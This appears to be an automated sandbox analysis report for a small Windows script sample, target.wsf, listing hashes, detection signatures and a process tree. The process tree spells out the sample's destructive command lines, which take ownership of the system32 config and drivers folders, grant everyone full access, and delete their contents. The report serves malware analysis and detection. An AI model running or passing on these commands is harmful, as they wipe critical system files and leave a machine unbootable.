Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:40
Static task
static1
Behavioral task
behavioral1
Sample
target.wsf
Resource
win7-20240729-en
General
-
Target
target.wsf
-
Size
3KB
-
MD5
84b27604951d4deb2f10cc65c8f5c8a4
-
SHA1
74b27bad7133462abf462923dd3d056a4d655941
-
SHA256
ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
-
SHA512
d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 1876 takeown.exe 2612 takeown.exe 1744 icacls.exe 904 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exepid process 904 icacls.exe 1876 takeown.exe 2612 takeown.exe 1744 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2612 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2184 wrote to memory of 2804 2184 cmd.exe WScript.exe PID 2184 wrote to memory of 2804 2184 cmd.exe WScript.exe PID 2184 wrote to memory of 2804 2184 cmd.exe WScript.exe PID 2804 wrote to memory of 2640 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 2640 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 2640 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 2972 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 2972 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 2972 2804 WScript.exe cmd.exe PID 2640 wrote to memory of 1876 2640 cmd.exe takeown.exe PID 2640 wrote to memory of 1876 2640 cmd.exe takeown.exe PID 2640 wrote to memory of 1876 2640 cmd.exe takeown.exe PID 2972 wrote to memory of 2612 2972 cmd.exe takeown.exe PID 2972 wrote to memory of 2612 2972 cmd.exe takeown.exe PID 2972 wrote to memory of 2612 2972 cmd.exe takeown.exe PID 2640 wrote to memory of 1744 2640 cmd.exe icacls.exe PID 2640 wrote to memory of 1744 2640 cmd.exe icacls.exe PID 2640 wrote to memory of 1744 2640 cmd.exe icacls.exe PID 2972 wrote to memory of 904 2972 cmd.exe icacls.exe PID 2972 wrote to memory of 904 2972 cmd.exe icacls.exe PID 2972 wrote to memory of 904 2972 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1876
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:904
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD584b27604951d4deb2f10cc65c8f5c8a4
SHA174b27bad7133462abf462923dd3d056a4d655941
SHA256ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
SHA512d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce
-
Filesize
79B
MD5dfcef0997fe6b53193f96908bc2d7839
SHA1bec87de5852184953fe5025aa7a6017e23deead1
SHA2569d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
SHA512ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74